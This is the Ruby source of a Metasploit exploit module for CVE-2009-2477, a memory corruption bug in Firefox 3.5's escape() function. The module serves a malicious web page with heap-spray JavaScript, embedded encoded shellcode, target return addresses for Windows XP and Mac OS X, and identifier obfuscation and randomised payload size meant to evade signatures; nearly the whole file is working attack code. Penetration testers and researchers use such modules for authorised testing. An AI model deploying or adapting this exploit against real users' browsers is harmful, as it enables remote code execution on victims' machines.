Path: blob/master/modules/exploits/multi/browser/firefox_escape_retval.rb
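##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  #
  # This module acts as an HTTP server
  #
  include Msf::Exploit::Remote::HttpServer::HTML

  #include Msf::Exploit::Remote::BrowserAutopwn
  #autopwn_info({
  # :ua_name => HttpClients::FF,
  # :ua_minver => "3.5",
  # :ua_maxver => "3.5",
  # :os_name => OperatingSystems::Match::WINDOWS,
  # :javascript => true,
  # :rank => NormalRanking, # reliable memory corruption
  # :vuln_test => nil,
  #})

  # Module metadata. Each target carries the heap-spray parameters that
  # generate_html interpolates into the page: 'Ret' (the address the spray
  # blocks are filled with), 'BlockLen' (minimum size of one spray block) and
  # 'Containers' (how many blocks are allocated before the bug is triggered).
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Firefox 3.5 escape() Return Value Memory Corruption',
      'Description' => %q{
        This module exploits a memory corruption vulnerability in the Mozilla
        Firefox browser. This flaw occurs when a bug in the javascript interpreter
        fails to preserve the return value of the escape() function and results in
        uninitialized memory being used instead. This module has only been tested
        on Windows, but should work on other platforms as well with the current
        targets.
      },
      'License' => MSF_LICENSE,
      'Author' =>
        [
          'Simon Berry-Byrne <x00050876[at]itnet.ie>', # Author / Publisher / Original exploit
          'hdm', # Metasploit conversion
        ],
      'References' =>
        [
          ['CVE', '2009-2477'],
          ['OSVDB', '55846'],
          ['BID', '35660'],
          ['URL', 'https://bugzilla.mozilla.org/show_bug.cgi?id=503286']
        ],
      'Payload' =>
        {
          # Payload space is randomised per module instance (1000..2020 bytes,
          # in 4-byte steps) so the shellcode length is not a fixed signature.
          'Space' => 1000 + (rand(256).to_i * 4),
          'BadChars' => "\x00",
        },
      'Platform' => %w{ win osx },
      'Targets' =>
        [
          [ 'Firefox 3.5.0 on Windows XP SP0-SP3',
            {
              'Platform' => 'win',
              'Arch' => ARCH_X86,
              'Ret' => 0x0c0c0c0c,
              'BlockLen' => 0x60000,
              'Containers' => 800,
            }
          ],
          [ 'Firefox 3.5.0 on Mac OS X 10.5.7 (Intel)',
            {
              'Platform' => 'osx',
              'Arch' => ARCH_X86,
              'Ret' => 0x41414141,
              'BlockLen' => 496,
              'Containers' => 800000
            }
          ]
        ],
      'DefaultTarget' => 0,
      'DisclosureDate' => '2009-07-13'
    ))
  end

  # HTTP handler: every request to the module URI gets a freshly generated
  # exploit page (new encoded payload, new random identifiers).
  #
  # @param cli     [Socket] client connection
  # @param request [Rex::Proto::Http::Request] incoming request (unused)
  def on_request_uri(cli, request)
    # Re-generate the payload; bail out quietly if that is not possible
    p = regenerate_payload(cli)
    return unless p

    print_status("Sending #{self.name}")
    send_response_html(cli, generate_html(p), { 'Content-Type' => 'text/html; charset=utf-8' })
    handler(cli)
  end

  # Build the exploit page for the current target.
  #
  # The JavaScript first heap-sprays target['Containers'] strings, each made of
  # target['Ret'] repeated to at least target['BlockLen'] bytes followed by the
  # shellcode, a few per timer tick. Once the spray is complete it walks the
  # <font> elements under #content and runs their text through escape(). The
  # escape() return value is what CVE-2009-2477 fails to preserve, so control
  # is expected to land inside the sprayed region at target['Ret'].
  #
  # @param payload [Msf::EncodedPayload] payload whose #encoded bytes are embedded
  # @return [String] HTML document
  def generate_html(payload)
    endian = Rex::Arch.endian(target.arch)

    # Shellcode and return address as %uXXXX sequences for unescape().
    enc_code = Rex::Text.to_unescape(payload.encoded, endian)
    enc_ret = Rex::Text.to_unescape(
      [target.ret].pack(endian == ENDIAN_LITTLE ? 'V' : 'N')
    )

    # Random key/value names used inside the JS lookup tables.
    var_data_str1 = Rex::Text.rand_text_alpha(3)
    var_data_str2 = Rex::Text.rand_text_alpha(4)

    js = <<-EOF
var xunescape = unescape;
var shellcode = xunescape("#{enc_code}");

oneblock = xunescape("#{enc_ret}");

var fullblock = oneblock;
while (fullblock.length < #{target['BlockLen']})
{
  fullblock += fullblock;
}

var sprayContainer = new Array();
var sprayready = false;
var sprayContainerIndex = 0;

function fill_function()
{
  if(! sprayready) {
    for (xi=0; xi<#{target['Containers']}/100; xi++, sprayContainerIndex++)
    {
      sprayContainer[sprayContainerIndex] = fullblock + shellcode;
    }
  } else {
    DataTranslator();
    GenerateHTML();
  }
  if(sprayContainer.length >= #{target['Containers']}) {
    sprayready = true;
  }
}

var searchArray = new Array();

function escapeData(data)
{
  var xi;
  var xc;
  var escData='';
  for(xi=0; xi<data.length; xi++)
  {
    xc=data.charAt(xi);
    if(xc=='&' || xc=='?' || xc=='=' || xc=='%' || xc==' ') xc = escape(xc);
    escData+=xc;
  }
  return escData;
}

function DataTranslator()
{
  searchArray = new Array();
  searchArray[0] = new Array();
  searchArray[0]["#{var_data_str1}"] = "#{var_data_str2}";
  var newElement = document.getElementById("content");
  if (document.getElementsByTagName) {
    var xi=0;
    pTags = newElement.getElementsByTagName("p");
    if (pTags.length > 0)
    while (xi < pTags.length)
    {
      oTags = pTags[xi].getElementsByTagName("font");
      searchArray[xi+1] = new Array();
      if (oTags[0]) {
        searchArray[xi+1]["#{var_data_str1}"] = oTags[0].innerHTML;
      }
      xi++;
    }
  }
}

function GenerateHTML()
{
  var xhtml = "";
  for (xi=1;xi<searchArray.length;xi++)
  {
    xhtml += escapeData(searchArray[xi]["#{var_data_str1}"]);
  }
}

setInterval("fill_function()", .5);
    EOF

    # Obfuscate it up a bit: rename every JS identifier we control so the
    # page does not carry a static signature.
    js = obfuscate_js(js, 'Symbols' => {
      'Variables' => %W{ DataTranslator GenerateHTML escapeData xunescape
        shellcode oneblock fullblock sprayContainer xi searchArray xc
        escData xhtml pTags oTags newElement sprayready sprayContainerIndex
        fill_function }
      }).to_s

    # Filler text for the <font> elements. str1/str2 are purely alphabetic and
    # pass through escapeData() untouched; str3 ends with a space, which is one
    # of the characters escapeData() hands to escape() -- that call is the
    # trigger.
    str1 = Rex::Text.rand_text_alpha(20)
    str2 = Rex::Text.rand_text_alpha(24)
    str3 = Rex::Text.rand_text_alpha(10) + " "

    return %Q^
<html>
<head>
</head>
<body>
<div id="content">
<p>
<FONT>
</FONT>
</p>
<p>
<FONT>#{str1}</FONT></p>
<p>
<FONT>#{str2}</FONT>
</p>
<p>
<FONT>#{str3}</FONT>
</p>
</div>
<script language="JavaScript">
#{js}
</script>
</body>
</html>
^
  end
end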